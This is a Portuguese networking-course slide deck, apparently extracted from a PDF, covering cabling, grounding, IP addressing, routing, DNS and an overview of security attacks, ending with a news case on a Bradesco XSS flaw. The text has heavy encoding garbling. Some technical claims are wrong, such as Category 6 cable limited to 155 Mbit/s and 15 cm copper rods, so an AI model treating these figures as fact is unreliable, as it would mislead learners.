2. PrĂŠ-requisitos:
¨ Conhecimentos båsicos em redes
¨ Quem sou eu?
¨ Quem são vocês?
¨ O que esperam da matÊria?
¨ Quais as experiências em Redes?
¨ Conhecimentos em Windows Server e/ou
Linux?
2
Apresentação
3. Sinopse:
I - RevisĂŁo dos Conhecimentos BĂĄsicos de Redes: Conceitos de Redes, equipamentos,
perifĂŠricos e conexĂŁo da rede
II - Noçþes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificação de uma rede,
elaboração de um anteprojeto de rede, elaboração de um projeto de redes.
III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP,
subnet de rede, roteamento de rede
IV - Redes Ponto-a-Ponto Projeto;
V - Segurança de Rede: Noçþes de segurança fĂsica e lĂłgica, objetivos, introdução a ataques,
vulnerabilidade, como previnir ataques
VI - Windows 2003 Server: Instalação, configuração de serviços (DHCP, DNS, WINS, IIS, FTP),
servidor de arquivos, servidor de ImpressĂŁo, Active Direct, Segurança em nĂvel de recursos
- PermissĂľes de arquivos, Backup e Recuperação, Logs e Serviços, Monitoramento fĂsico e
lĂłgico da rede
VII â Linux: Instalação, configuração de serviços (DHCP, FTP, APACHE, SSH), Segurança em
nĂvel de Recursos - PermissĂľes de arquivos, Backup e Recuperação, Logs, Serviços,
acessos apartir de estaçþes Windows e Transmissão de arquivos entre windows e linux
VIII - Ambiente Misto: Integração de serviços (WEB, FTP, BACKUP) entre a plataforma
Windows 2003 e Linux com os clientes Windows XP 3
4. Plano de Aula:
Utilização de Notebook e datashow e pråtica nos
desktops de vocĂŞs;
Serão avaliaçþes Mensais:
4
Avaliação:
5. Materiais do curso e outros do autor
¨ Senai
- Apostila
http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_-
_TURMA_AVANCADA.html
- Redes Avançadas Power Point
http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html
- Redes BĂĄsicas â Power Point
http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html
¨ Esamaz
Segurança de Sistemas
http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html
Firewall
http://www.4shared.com/file/40014575/5e5292cb/Firewall.html
Script Linux
http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html
VĂrus
http://www.4shared.com/file /42802741/12513457/virus.html
Criptografia
http://www.4shared.com/file/43349581/53517583/Criptografia.html
Segurança de Redes
http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html
5
8. O que ĂŠ Redes de
computadores?
⢠Possibilitar o compartilhamento de informaçþes (programas e dados) armazenadas nos
computadores da rede;
⢠Permitir o compartilhamento de recursos associados às måquinas interligadas;
⢠Permitir a troca de informaçþes entre os computadores interligados;
⢠Permitir a troca de informaçþes entre usuårios dos computadores interligados;
⢠Possibilitar a utilização de computadores localizados remotamente;
⢠Permitir o gerenciamento centralizado de recursos e dados;
⢠Melhorar a segurança de dados e recursos compartilhados 8
10. Tipos de Redes
⢠Usada em redes pequenas (normalmente atÊ 10 micros);
⢠Baixo Custo;
⢠Fåcil implementação;
⢠Baixa segurança;
⢠Sistema simples de cabeamento;
⢠Micros funcionam normalmente sem estarem conectados a rede;
⢠Micros instalados em um mesmo ambiente de trabalho;
⢠Não existe um administrador de rede;
⢠Não existe micros servidores;
⢠A rede terå problemas para crescer de tamanho.
10
Ponto x Ponto
11. Cliente x Servidor
¨ Deseja ter uma maior segurança na rede. (Nesse
tipo de rede aparece uma figura denominada
servidor. O servidor ĂŠ um computador que oferece
recursos especializados, para os demais micros da
rede, ao contrĂĄrio do que acontece com a rede
ponto-a-ponto onde os computadores compartilham
arquivos entre si e tambĂŠm podem estar fazendo um
outro processamento em conjunto).
¨ Outra vantagem das redes cliente/servidor Ê a forma
centralizada de administração e configuração, o que
melhora a segurança e organização da rede.
11
12. Tipos de Servidores
¨ Servidor de Arquivos: à um servidor responsåvel pelo armazenamento de
arquivos de dados â como arquivos de texto, planilhas eletrĂ´nicas, etc... Ă
importante saber que esse servidor sĂł ĂŠ responsĂĄvel por entregar os dados
ao usuĂĄrio solicitante (cliente), nenhum processamento ocorre nesse servidor,
os programas responsĂĄveis pelo processamento dos dados dos arquivos
deve estar instalados nos computadores clientes.
¨ Servidor de Impressão: à um servidor responsåvel por processar os
pedidos de impressĂŁo solicitados pelos micros da rede e enviĂĄ-los para as
impressoras disponĂveis. Fica a cargo do servidor fazer o gerenciamento das
impressĂľes.
¨ Servidor de Aplicaçþes: à responsåvel por executar aplicaçþes do tipo
cliente/servidor como, por exemplo, um banco de dados. Ao contrĂĄrio do
servidor de arquivos, esse tipo de servidor faz processamento de
informaçþes.
¨ Servidor de Correio Eletrônico: Responsåvel pelo processamento e pela
entrega de mensagens eletrĂ´nicas. Se for um e-mail destinado a uma pessoa
fora da rede, este deverå ser passado ao servidor de comunicação (firewall)
¨ Servidor de Comunicação (Firewall): Usado para comunicação da sua
rede com outras redes, como a Internete Se vocĂŞ acessa a Internet atravĂŠs
de uma linha telefônica convencional, o servidor de comunicação pode ser um
computador com uma placa de modem ou conexĂľes com ADSL ou LPCD.
12
13. Vantagens e Desvantagem do Cliente x
Servidor ¨ Custo Maior desempenho do que as redes ponto-a-ponto;
¨ Implementação necessita de especialistas;
¨ Melhor desempenho que as redes ponto-a-ponto;
¨ Alta segurança;
¨ Configuração e manutenção na rede Ê feita de forma centralizada;
¨ Existência de servidores, que são micros capazes de oferecer recursos
aos demais micros da rede
13
16. Cabeamento Estruturado
¨ Cabo UTP
¨ UTP Color Codes
Par 1 Branco-Azul (BA) / Azul (A)
Par 2 Branco-Laranja (BL) / Laranja (L)
Par 3 Branco-Verde (BV) / Verde (V)
Par 4 Branco-Marrom (BM) / Marrom (M)
16
17. Cabeamento Estruturado
Cabo UTP / CATEGORIAS
¨ Categoria 1 â cabo de par trançado tradicional, que ĂŠ o utilizado para
telefonia (instalado antes de 1983). Não Ê recomendado para utilização
em redes locais.
¨ Categoria 2 â cabo certificado para transmissĂŁo de dados (possui 4
pares trançados). Sua utilização em redes tambÊm não Ê recomendåvel.
¨ Categoria 3 â esta categoria suporta 10 Mbit/sec numa rede Ethernet,
4Mbit/s em uma Token Ring. Este cabo permite que atĂŠ quatro telefones
normais ou dois multilinhas sejam conectados ao equipamento da
companhia telefĂ´nica.
¨ Categoria 4 â esta categoria suporta taxas de transmissĂŁo de atĂŠ 16
Mbit/s em uma rede Token Ring. Este cabo possui quatro pares.
¨ Categoria 5 â possui 4 pares trançados com oito torçþes. Suporta taxas
de transmissão de 100 Mbit/s. Sua utilização Ê adequada para redes Fast
Ethernet e redes ATM. No inĂcio dos anos 90, 60% dos edifĂcios possuĂam
este tipo de cabo (EUA).
¨ Categoria 6 â tambĂŠm possui 4 pares trançados. Suporta taxas de
transmissão de atÊ 155 Mbit/s. Sua utilização Ê adequada a redes Fast
Ethernet para transmissĂŁo de dados e voz.
17
19. Cabeamento Estruturado
¨Delay
Ă um dos itens mais importantes, pois a estruturação fĂsica pode
influenciar na performance e velocidade da rede. Ă ideal que
tenha o menor número de segmentação e quando ocorrer a
segmentação que seja centralizado os servidores, pontos de
saĂda da rede e principais clientes no switch principal.
19
20. Cabeamento Estruturado
¨Processo da Crimpagem
Normal - Padronização EIA/TIA 568ÂŞ â Conhecida
como âseqßência de crimpagem de normalâ. Utilizada para
conexĂŁo de um microcomputador a um HUB ou SWITCH.
20
EIA/TIA-568ÂŞ
1. Branco-Verde
2. Verde
3. Branco-Laranja
4. Azul
5. Branco-Azul
6. Laranja
7. Branco-Marrom
8. Marrom
21. Cabeamento Estruturado
¨Crossover - Um cabo crossover consiste na interligação de
2 (dois) computadores pelas respectivas placas de rede sem ser
necessårio a utilização de um concentrador (Hub ou Switch) ou a
ligação de modems a CABO com a maquina cliente com conectores
do tipo RJ45. A alteração dos padrþes das pinagens dos cabos torna
possĂvel a configuração de cabo crossover ou cabo direto. A ligação ĂŠ
feita com um cabo de par trançado (na maioria das vezes) onde se
tem: em uma ponta o padrĂŁo T568A, e, em outra o padrĂŁo T568B
(utilizado tambĂŠm com modems ADSL).
21
1ÂŞ ponta do
cabo
branco verde
verde
branco laranja
azul
branco azul
laranja
branco marrom
marrom
2ÂŞ ponta do
cabo
branco laranja
laranja
branco verde
azul
branco azul
verde
branco marrom
marrom
37. SugestĂŁo para a Rede ElĂŠtrica
¨Ideal ter a cada circuito de 10 A atÊ 3
tomadas;
¨Não permitir que sejam ligados outros
equipamentos como: Copiadoras,
ventiladores, motores elĂŠtricos, ou
qualquer outro que exija ou produza
ruĂdo na linha.
37
39. SugestĂŁo para a Rede ElĂŠtrica
¨As tomadas devem ser do tipo
universal de trĂŞs pinos (tripolares) e a
ligação fase/neutro/terra
¨ As tensþes aproximadas na rede elÊtrica deverão ser as
seguintes:
Entre terra e fase = 117 V
Entre neutro e fase = 115 V
Entre terra e neutro = 2,5 V(valor Maximo tolerado) 39
41. Aterramento
¨ O terra dos equipamentos de informåtica DEVE ser
totalmente independente dos demais terras
existentes.
¨ Observando o seguinte na instalação:
Ser construĂdo ĂĄ distância mĂnima de 2,40m dos outros
terras do quadro e do neutro e a uma distância
mĂnima de 25,00 do terra de pĂĄra-raios.
O cabo que liga as barras de aterramento ao quadro
deve ser encapado, possuir bitola compatĂvel com a
distancia entre o sistema e o quadro, e NĂO
DEVERĂ ESTAR NUNCA CONECTADO AO
NEUTRO.Não são aconselhåveis distâncias maiores
que 50m entre o terra e o quadro de distribuição.
41
42. Aterramento
¨ Material necessårio para um aterramento simples:
- 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de
diâmetro.
- 6 abraçadeiras de bronze para as barras de cobre.
- 10 metros de fio isolado, de bitola idĂŞntica ĂĄ dos fios fase e
neutro.
- Sal grosso, carvĂŁo vegetal e enxofre em quantidades suficientes
para cobrir o poço dos eletrodos.
- Ăgua destilada suficiente para regar a mistura.
- As barras de cobre sĂŁo chamadas eletrodos de aterramento; dĂŁo
uma referĂŞncia de terra de 0 volte uma conexĂŁo ĂĄ terra para
descargas elĂŠtricas atmosfĂŠricas. TambĂŠm fornecem uma
trajetória de impedância baixa å terra ( valor måximo de 25
ohms).
42
44. Aterramento
¨ Consequências da falta de
aterramento:
- Aparição de BAD CLUSTERS no HD ou atÊ
mesmo a perda total. Isto nĂŁo demora a
acontecer.
- VocĂŞ poderĂĄ perder seu HD em 2 ou 3 meses.
- Danos na placa mĂŁe.
- Danos na memĂłria, que podem vir a causar
perda repentina de dados e ou congelamento
de todo o sistema.
44
46. Criação de AnteProjeto de Rede
¨Veja quando falamos em projeto, não
queremos e nĂŁo vamos formar
engenheiros aqui, nossa intenção e
mostrar que uma documentação bem
feita pode ser o diferencial dentro desta
ĂĄrea , o projeto pode ser escrito, nĂŁo
necessariamente um desenho, lĂłgico
que se possuir o desenho ĂŠ muito
melhor, mesmo porque hoje existem
ferramentas para auxiliar neste
propĂłsito.
46
48. Elaboração de um Projeto de Rede
48
¨ Informaçþes repassada pelo empresa:
- 1 Caso: Rede 100 % cabeada;
- 2 Caso: Rede Mista
¨ Criação da Documentação do Projeto:
- Crianção do Site Survey;
- Criação do anteprojeto;
- Entrega do Asbuilt pela empresa prestadora
do serviço;
52. ExercĂcio: Criação de
anteprojeto
52
¨ Informaçþes repassada pelo empresa (Site
Survey):
- As paredes externas são de cerâmico aparente e as paredes
internas, incluindo as salas laterais , de reboco liso e pintado;
- O teto ĂŠ de forro falso e o piso ĂŠ de granito natural;
- O departamento de telemarketing possui divisĂłrias baixas
acĂşsticas em formas de âbaiasâ, de madeira, revestida com
espuma de poliuretano e tecido grosso;
- Toda iluminação Ê feita com luminårias com 4 lâmpadas
fluorescentes de 40 W x 220 V e localizada no centro
geomĂŠtrico de cada ambiente;
- Altura entre o forro e o piso ĂŠ de 2,6m;
- A sala de treinamento, recebe freqĂźentemente pessoas nĂŁo
ligadas a empresa, alĂŠm disso seu layout ĂŠ constantemente
alterado;
57. A Mensagem em Camadas
Remetente
Mensagem
Escrita
Envelope
AgĂŞncia
-VocĂŞ tem uma idĂŠia e DestinatĂĄrio
deseja comunica-la a
outra pessoa
-Tem de escolher a forma
de expressar essa idĂŠia
-VocĂŞ decide como de
uma forma apropriada
-Enfim, de fato expĂľe sua
idĂŠia
Rodovia/Malote
Mensagem
Escrita
Envelope
AgĂŞncia
62. Endereços IP
¨Endereço IP: Indentificador de Rede
+ Indentificador de HOST
62
Endereço IP de 32 bits
Identificador da
rede
Identificador do
host
REDE
internet
REDE
REDE REDE
hosts com o
mesmo
identificador de
rede.
host
hosts com
identificadores
de rede
distintos.
63. 63
Como atribuir IPâs para rede
abaixo?
SĂO PAULO CURITIBA
...
...
230 computadores 200 computadores
64. 64
endereço classe C
MĂSCARA: 255.255.255.0
identificador de rede identificador do host
200.0.0.3 200.0.0.4 200.0.0.5
roteador
200.0.0.2
200.0.0.1
200.0.1.1
200.0.1.2 200.0.1.3 200.0.1.4 200.0.1.5
O roteador possui dois endereços IP, um para cada rede.
65. 65
Como Atribuir IPâs para rede abaixo?
SĂO PAULO CURITIBA
...
...
400 computadores 600 computadores
...
500 computadores
RIO DE JANEIRO
66. Solucionar Principais Problemas
¨ Usando o Utilitårio IPConfig
O utilitĂĄrio IPConfig ĂŠ muito Ăştil para determinar se as
configuraçþes de rede atuais são desejadas. Vårios erros
podem ser detectados atravĂŠs deste utilitĂĄrio. Execute-o
atravĂŠs de um Prompt de Comando (clique em Start -> Run e
digite CMD), digitando ipconfig /all e teclando Enter.
67. Solucionar Principais Problemas
¨ Conflito de IP: Ocorre quando um IP manual ĂŠ atribuĂdo Ă mĂĄquina e jĂĄ
existe outro computador na rede com o mesmo IP. Nesse caso, a tela do
Ipconfig deve se parecer com a seguinte:
¨ Note que os campos IP e Måscara de Subrede estão zerados. Essa Ê a
principal caracterĂstica de um conflito de IPs.
- Configuração incompleta: Certifique-se de que os campos DNS Servers e
Default Gateway nĂŁo estĂŁo em branco.
68. Solucionar Principais
Problemas
¨ Note que, como não hå servidor DNS e nem Default Gateway
configurados, o computador somente poderĂĄ enviar e receber
dados dentro da rede local e com outros computadores
69. Solucionar Principais
Problemas ¨Usando o Utilitårio PING
Ela se refere ao utilitĂĄrio do TCP/IP denominado "Ping", que tem como
função testar se um host estå ativo, enviando um pacote de dados
para esse host e pedindo uma reposta caso ele esteja online e
funcionando corretamente. Então, "pingar" o endereço de loopback
simplesmente testa se sua mĂĄquina inicializou o TCP/IP corretamente.
Para fazer isso, entre em um Prompt de Comando e digite: ping
127.0.0.1 e tecle Enter. VocĂŞ tambĂŠm poderĂĄ pingar no IP da placa
assim como de qualquer mĂĄquina da rede, assim como por nome
dependendo de alguns serviços. Vale ser ressalta que o ping pode ser
desabilitado.
70. Solucionar Principais
Problemas ¨ Usando o Utilitårio NETSTAT e TELNET
NETSTAT â verifica os serviços que localmente a mĂĄquina/host estĂĄ
provendo
TELNET: Tem como função testar se o serviço estå ativo. Para fazer isso,
entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO.
Este Teste serve tanto se vocĂŞ local ou remoto da mĂĄquina que estĂĄ
provendo o serviço.
72. Roteamento Indireto
¨Origem e Destino estão em redes
diferentes
10.35.143.10 10.35.144.15
REDE
10.35.143.0
Tabela de Roteamento
Destino Gateway
10.35.143.0 DIRETO
0.0.0.0 10.35.143.1
10.35.143.1 10.35.144.1
Router
REDE
10.35.144.0
Tabela de Roteamento
Destino Gateway
10.35.143.0 10.35.143.1
10.35.144.0 10.35.144.1
....... .......
Tabela de Roteamento
Destino Gateway
10.35.144.0 DIRETO
0.0.0.0 10.35.144.1
73. Exemplo de roteamento
Exemplo de uma rede Intranet constituĂda de duas
redes fĂsicas conectadas por um roteador.
192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4
192.168.0.5
192.168.1.5
roteador
interno
rede 192.168.0.x
rede 192.168.1.x servidor
192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4
rede interna de uma empresa.
79. 79
ExercĂcio 2:
¨ Utilizando a classe C: 200.0.0.0 (255.255.255.0)
â A) distribua os IPâs nas duas redes abaixo
â B) defina a tabela de roteamento do roteador 1.
1 2 INTERNET
100
computadores
100
computadores
81. DNS - Domain Name Service
¨Padrão Aberto para Resolução de
Nomes HierĂĄrquicos
â Agrupa nomes em domĂnios.
â A ĂĄrvore de nomes ĂŠ armazenada num
banco ddee ddaaddooss ddiissttrriibbuuĂĂddoo.
¨Especificaçþes do DNS
â RFCs 1033, 1034, 1034, 1101, 1123, 1183
e 1536.
⢠Expecificaçþes da Internet Task Force
â Berkeley Internet Name Domain (BIND)
⢠Implementação desenvolvida na Berkley
University para a versĂŁo 4.3 SD Unix
82. S Demonstraçþes: Seerrvviiççooss ddee NNoommeess
A função principal dos serviços de
nomes ĂŠ traduzir nomes de domĂnio para os
seus respectivos endereços IPâs.
wwwwww..coai.dceo.cmo m= 1=0 3.15.03.51.02..180
wwwwww.c.aodi.ec.ocmom
wwwwww..auvfg.c.bomr = =5 02.07.52.09.62.08.80
wwwwww..auvfg.c.borm
SSeerrvviiddoorr DDNNSS
85. Elaboração de Projeto
¨Criar uma formulårio / checklist de
informaçþes que deverão que serão
coletadas junto a conversa inicial.
85
Qual a finalidade ?
Quem vai acessar (de onde, como, que solução) ?
Quantos computadores ?
De onde vai ser o acesso ?
Q o s ?
Local FĂsico (disponibilidade para cabeamento)
86. Elaborar uma proposta /
Solução. ¨ Itens informados:
- 2 casas (distante 500 mts) sendo que uma
ĂŠ tombada pelo patrimĂ´nio histĂłrico;
- Acesso de usuĂĄrio em uma rede local e
clientes via Web (internet);
- Acesso de funcionĂĄrios a pastas
especĂficas de arquivos, assim como
acesso ao sistema corporativo;
- 500 computares (300 comp. Em uma casa
e 200 em outra);
- NĂŁo posso para meu acesso nem por 1
minuto 86
89. 89
O sistema informĂĄtico mais
seguro nĂŁo ĂŠ utilizĂĄvel
O sistema informĂĄtico mais
utilizĂĄvel ĂŠ inseguro
SĂł existe um computador 100%
seguro, o desligado.
90. 90
Introdução
¨ A Segurança da Informação pode ser
definida como a proteção de dados
contra a revelação acidental ou
intencional a pessoas nĂŁo autorizadas, e
contra alteraçþes não permitidas.
¨ A segurança no universo computacional
divide-se em:
â Segurança FĂsica
â Segurança LĂłgica
91. 91
Introdução (cont.)
¨Objetivo da Segurança Informåtica
â Seja qual for a dimensĂŁo de um sistema
informĂĄtico, deve procurar-se atingir, na
sua exploração, os seguintes objetivos:
⢠Integridade do equipamento
⢠Confidencialidade e a qualidade da
informação
⢠Prontidão do sistema (eficiência x
eficĂĄcia)
92. O que vocĂŞ estĂĄ tentando
proteger?
¨Seus dados
Integridade
Privacidade
Disponibilidade
¨Seus recursos
¨Sua reputação
92
93. Contra o que vocĂŞ estĂĄ tentando
se proteger?
¨Roubo de senhas
¨Engenharia Social
¨BUG & Backdoors
¨Falha de autenticação
¨Falha de protocolo
¨Obtendo Informaçþes
¨Negando serviços (DoS)
93
94. 94
Objetivos da Segurança
¨ O objetivo da segurança da informação
abrange desde uma fechadura na
porta da sala de computadores atĂŠ o
uso de tĂŠcnicas criptogrĂĄficas
sofisticadas e códigos de autorização .
¨ O estudo não abrange somente o crime
computacional (hackers), envolve
qualquer tipo de violação da
segurança, como erros em
processamento ou cĂłdigos de
programação .
95. Objetivos da Segurança
âSegurança nĂŁo ĂŠ uma tecnologiaâ
Quem?
O que?
Quando?
Como?
Onde?
Porque?
96. 96
Objetivos da Segurança
¨A segurança de dados tem por
objetivo restringir o uso de
informaçþes (softwares e dados
armazenados) no computador e
dispositivos de armazenamento
associados a indivĂduos selecionados.
97. Os objetivos da Segurança da
Informação são:
¨Preservação do patrimônio da empresa
(os dados e as informaçþes fazem
parte do patrimĂ´nio ).
â Deve-se preservĂĄ-lo protegendo-o contra
revelaçþes acidentais, erros operacionais e
contra as infiltraçþes que podem ser de
dois tipos:
97
⢠Ataques passivos (interceptação)
⢠Ataques ativos (interrupção,
modificação e Fabricação)
98. Ataques passivos
AAtataqquueess P Paassssivivooss
Intercepção
AnĂĄlise do
conteĂşdo das
mensagens
AnĂĄlise do trĂĄfego
O objetivo Ê obter informação que estå a ser transmitida.
Este tipo de ataques ĂŠ muito difĂcil de detectar. O esforço de
protecção deve ser no sentido da prevenção.
99. Ataques Passivos
¨ AnĂĄlise do conteĂşdo das mensagens â Escutar e
entender as informaçþes.
¨ AnĂĄlise do trĂĄfego â O oponente pode determinar a
origem e identidade das comunicaçþes e pode
observar a frequĂŞncia e comprimento das mesmas.
Esta informação pode ser útil para determinar a
natureza da comunicação. Os ataques passivos
sĂŁo muito difĂceis de detectar porque nĂŁo
envolvem nenhuma alteração de dados. A
ênfase ou o esforço deve desenvolvido no
sentido da prevenção e não da detecção.
100. Emissor Receptor
Intercepção
Intercepção
Intercepção â Quando utilizadores nĂŁo autorizados conseguem
aceder a recursos para os quais nĂŁo estavam autorizados. Ă
um ataque Ă confidencialidade. A parte nĂŁo autorizada pode
ser uma pessoa, um programa ou um computador. Exemplos:
violação de cabos de comunicação, para capturar dados da
rede, cĂłpia ilĂcita de pastas e programas, etc.
101. AAtataqquueess A Atitvivooss
Interrupção
(Disponibilidade)
Modificação
(Integridade)
Fabricação
(Autenticidade)
Ataques Ativos
¨ Envolvem alguma modificação de dados.
¨ Este tipo de ataques ĂŠ muito difĂcil de prever, jĂĄ que, para isso,
seria necessårio uma proteção completa de todos os tipos de
comunicaçþes e de canais. Por esta razão, o esforço de
protecção deve ser no sentido de os detectar e recuperar dos
atrasos ou estragos entretanto causados.
102. Interrupção
Emissor Receptor
Interrupção
Interrupção â A informação de um sistema torna-se
indisponĂvel ou ĂŠ destruĂda. Ă um ataque Ă
disponibilidade.
Exemplos: Destruição de peças de Hardware, o corte de linhas
de comunicação, a inoperância do sistema de ficheiros, etc.
103. Modificação
Emissor Receptor
Modificação
Modificação â uma parte nĂŁo autorizada, nĂŁo sĂł acede Ă
informação, mas tambÊm a modifica. à um ataque de
integridade. Exemplos: alteração de valores num ficheiro de
dados; alteração de um programa para que ele funcione de
maneira diferente ou modificação do conteúdo de mensagens
transmitidas pela rede.
104. Emissor Receptor
Fabricação
Fabricação
Fabricação â uma parte nĂŁo autorizada insere dados
falsos no sistema. Ă um ataque Ă autenticidade.
Exemplos: inserção de mensagens simuladas na
rede ou a adição de registos a um ficheiro.
105. 105
O que ĂŠ ataque?
Ataque Ê toda ação realizada com
intuito ou nĂŁo de causar danos .
106. Vulnerabilidades
¨Todo computador Ê vulneråvel a
ataques. (Possui informação)
⢠Tipos de Vulnerabilidades
â Vulnerabilidades FĂsicas (Meio, Construção)
â Vulnerabilidades Naturais (Desastres Naturais)
â Vulnerabilidades de Hardware e Software(Falhas)
â Vulnerabilidades de Media (Roubos de Media)
â Vulnerabilidades de Comunicação (Hacker)
â Vulnerabilidades de Humanos (UsuĂĄrios)
â Vulnerabilidades sobre Exploit (Brechas, Copias)
108. Anatomia de um ataque
Varredura Reconhecimento
Enumeração
InvasĂŁo Escalando
privilĂŠgios
Acesso Ă
informação
Ocultação
de rastros
Negação de
Serviços
Instalação de
back doors
111. O que um hacker ataca ?
Aplicaçþes
Banco de dados
Sistemas operacional
Serviços de rede
112. 112
Tipos de ataques conhecidos
⢠Escutas
â Packet Sniffing â escuta e inspeciona cada pacote da rede
â IP/Session Hijacking â interceptação da seção pelo invasor
⢠Senha
â Uso de dicionĂĄrio de senhas
â Força bruta â tentativa e erro
⢠Outros ataques
â Alteração de site (web defacement)
â Engenharia social
â Ataque fĂsico Ă s instalaçþes da empresa
â Uso de cavalos de trĂłia e cĂłdigos maliciosos
â Trashing â revirar lixo em busca de informaçþes
â War dialing â liga para vĂĄrios nĂşmeros de telefone para identificar
os que tem modem instalado
113. 113
Motivação para o Ataque
⢠Por quê existem as invasþes aos sistemas?
â Orgulho
â Exibicionismo/fama
â Busca de novos desafios
â Curiosidade
â Protesto
â Roubo de informaçþes
â Dinheiro
â Uso de recursos adicionais
â Vantagem competitiva
â Vingança
115. Caso Real
Atualmente 70% das quebras de
segurança corporativas são geradas
internamente.
116. Caso Real
Perfil do Fraudador*:
⢠68% estão na MÊdia e Alta Gerências
⢠80% tem curso superior completo
⢠Predominantemente do Sexo Masculino
⢠Idade mÊdia entre 31 e 40 anos
*Pesquisa sobre crimes econĂ´micos - PWC 05
117. 117
Tipos de ataques conhecidos
⢠Negação de serviços
â Syn Flood â inundar a fila de SYN para negar novas conexĂľes
â Buffer overflow â colocar mais informaçþes do que cabe no buffer
â Distributed DoS (DDoS) â ataque em massa de negação de serviços
â Ping of Death â envio de pacote com mais de 65507 bytes
â Smurf â envio de pacote ICMP em broadcast a partir de uma mĂĄquina,
sendo inundada com as respostas recebidas
â CGI exploit
â Land, syn flooding, ...
⢠Simulação
â IP Spoofing â uso do IP de uma mĂĄquina para acessar outra
â DNS Spoofing â assumir o DNS de outro sistema
⢠Investigação
â Port scanning â varredura de portas para tentar se conectar e invadir
⢠Spam
â Acesso a um grande nĂşmero de pessoas, via email, com link para sites
clonados que pedem informaçþes pessoais
134. Ex5: Engenharia Social
¨ Ao atender um telefonema, o interlocutor se
identifica como vice-diretor da empresa. VocĂŞ
jĂĄ o viu pelos corredores, mas nunca falou
com ele por telefone. Ele informa que se
encontra na filial da empresa, em reuniĂŁo, e
estĂĄ com problemas para acessar o sistema.
Assim sendo, solicita a senha para que
possa ter acesso. Informa, ainda, que estĂĄ
acompanhado de 10 pessoas que possuem
outros compromissos e que nĂŁo podem
esperar por muito tempo.
134
142. Falha no site do Bradesco permitiu
ataque XSS
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
Criminosos brasileiros conseguiram descobrir um problema em uma
pĂĄgina do Bradesco que permitia que a mesma fosse âalteradaâ por meio
de links, possibilitando o uso do domĂnio do banco para todo tipo de
atividade maliciosa.
Para tal, crackers enviaram e-mail em massa contendo um link que
explorava uma falha de XSS (Cross Site Scripting) existente em uma
pĂĄgina localizada em institucional.bradesco.com.br. Se clicado, o link
enviava informaçþes à pågina que causavam um comportamento
indesejĂĄvel, fazendo com que argumentos da query string â como ĂŠ
chamada a parte do link depois do ponto de interrogação (âasp?âŚâ) â
fossem inseridas como cĂłdigo, permitindo o ataque.
Dias antes da publicação desta matÊria, a Linha Defensiva notificou o
Bradesco. O banco removeu a pĂĄgina vulnerĂĄvel dentro de
aproximadamente 48 horas, inutilizando o ataque.
A mensagem contendo o link que explorava a brecha solicitava o
recadastramento das âchaves de segurançaâ usadas nas transaçþes atravĂŠs
da Internet, convidando o usuĂĄrio a fazĂŞ-lo por meio do link.
142
143. Falha no site do Bradesco permitiu
ataque XSS
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
Como ĂŠ demonstrado na imagem, a maioria dos navegadores e os programas de e-mails
não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo
que a existĂŞncia do golpe seja percebida.
Embora o e-mail tenha usado uma tĂŠcnica refinada que facilmente poderia enganar atĂŠ
mesmo usuĂĄrios com certa experiĂŞncia, devido ao link camuflado, erros de ortografia
caracterĂsticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail
em massa usado pelos criminosos nĂŁo era compatĂvel com caracteres especiais,
como acentos.
143
144. Falha no site do Bradesco permitiu
ataque XSS
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
XSS
Cross Site Scripting, ou XSS, ĂŠ um tipo de vulnerabilidade onde determinada pĂĄgina de internet nĂŁo filtra
suficientemente as informaçþes enviadas pelo navegador web, sendo possĂvel fazĂŞ-la exibir conteĂşdos de
outros sites, ou conteúdos especificados no próprio link ou outra informação.
Um exemplo clåssico Ê a pågina de busca. Em geral, påginas de buscas exibem na tela a informação que
estĂĄ sendo procurada (por exemplo, âVocĂŞ estĂĄ procurando por: [termo de pesquisa]â). Se a exibição desta
informação não for filtrada corretamente, a informação, em vez de exibida, serå interpretada como código
HTML pelo navegador, possibilitando o ataque.
FĂłruns, livros de visitas e blogs (este Ăşltimo, devido Ă função de comentĂĄrios) podem ser vĂtimas do XSS
permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetarĂĄ qualquer usuĂĄrio
que o ver. Este ĂŠ o ataque de XSS persistente, ou tipo 2.
O Bradesco foi alvo do XSS impermanente ou nĂŁo-persistente, tambĂŠm chamado de XSS tipo 1.
O objetivo de ataques XSS ĂŠ geralmente roubar informaçþes importantes da vĂtima, tais como os cookies
de autenticação. PorÊm, XSS tambÊm pode ser usado para alterar os sites e usar da confiança depositada
pelo internauta na pågina para persuadi-lo a enviar informaçþes sigilosas, ou para rodar código malicioso
nos PCs de visitantes.
A Linha Defensiva jĂĄ noticiou a respeito de brechas semelhantes no YouTube e no Orkut.
Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail
144
e similares nĂŁo sejam clicados, a nĂŁo ser quando estava-se esperando absolutamente o e-mail em
questĂŁo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que
possĂvel, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o
que foi indicado no e-mail.
Brechas de XSS tipo 2 sĂŁo difĂceis de serem evitadas pelo usuĂĄrio, sendo a responsabilidade do site nesses
casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.
145. Falha no site do Bradesco permitiu
ataque XSS
(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-
inst-xss/)
Ao acessar o link, o internauta era direcionado para uma pĂĄgina do Bradesco
(Index_Pesquisa.asp) que, vulnerĂĄvel a XSS, carregava outra pĂĄgina, hospedada em um
